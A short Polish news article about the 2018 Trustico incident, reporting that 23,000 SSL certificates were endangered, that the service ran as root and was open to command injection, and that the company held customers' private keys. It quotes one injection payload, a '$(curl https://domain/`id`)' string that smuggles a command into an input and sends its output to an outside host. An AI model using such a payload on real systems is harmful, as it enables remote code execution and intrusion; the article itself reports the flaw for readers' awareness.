Wielka wpadka Trustico: 23 000 certyfikatów SSL zagrożonych

Wielka wpadka Trustico: 23 000 certyfikatów SSL zagrożonych

2018-03-04 17:39 Redakcja

Trustico, dostawca certyfikatów SSL, znalazł się w poważnych tarapatach po ujawnieniu, że 23 000 jego certyfikatów mogło trafić do wyrzutki. Wygląda na to, że serwis był uruchomiony na roocie, co umożliwiło banalne wstrzyknięcie kodu.

Jak do tego doszło? Wystarczyło wpisać prostą komendę: $(curl https://domain/`id`), co pozwoliło na wykonanie kodu w kontekście użytkownika root. Efekt był szokujący, ponieważ dostęp do systemu był nieograniczony. Przykład logów pokazuje, że atakujący uzyskał dostęp jako root.

Wielu użytkowników może być zaskoczonych, myśląc, że zakup certyfikatu SSL automatycznie zapewnia bezpieczeństwo ich strony. Jednak jak pokazuje przypadek Trustico, to tylko iluzja. Dodatkowo firma przyznała się do posiadania wszystkich kluczy prywatnych do wygenerowanych certyfikatów, co jest absolutnie nieakceptowalne.

Najnowsze wiadomosci ⚡📰

Nie przegap żadnego trendu, hacka ani dramy w świecie marketingu! 🧠
Mamy już ponad 155 000 artykułów i codziennie dorzucamy 50–100 nowych perełek z SEO, PR, social mediów, reklam, AI i brandingu. Do tego wywiady, nowe narzędzia pozwalające dowieźć wyniki i nutka prawa oraz bezpieczeństwa. Wszystko podane w starupowym sosie, który nigdy sie nie nudzi.
Zapisz się teraz, a Twoja skrzynka stanie się potężniejsza niż raporty z Analyticsa.